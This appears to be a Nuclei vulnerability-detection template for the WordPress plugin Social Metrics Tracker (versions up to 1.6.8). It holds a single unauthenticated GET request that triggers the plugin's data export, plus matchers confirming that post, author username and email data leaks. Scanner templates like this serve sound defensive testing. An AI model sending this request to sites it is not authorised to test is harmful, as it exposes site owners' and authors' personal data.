28 lines
832 B
YAML
28 lines
832 B
YAML
id: wordpress-social-metrics-tracker
|
|
|
|
info:
|
|
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
|
|
author: randomrobbie
|
|
severity: medium
|
|
description: |
|
|
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
|
|
tags: wordpress,wp-plugin,wp,unauth
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Main URL to Post"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|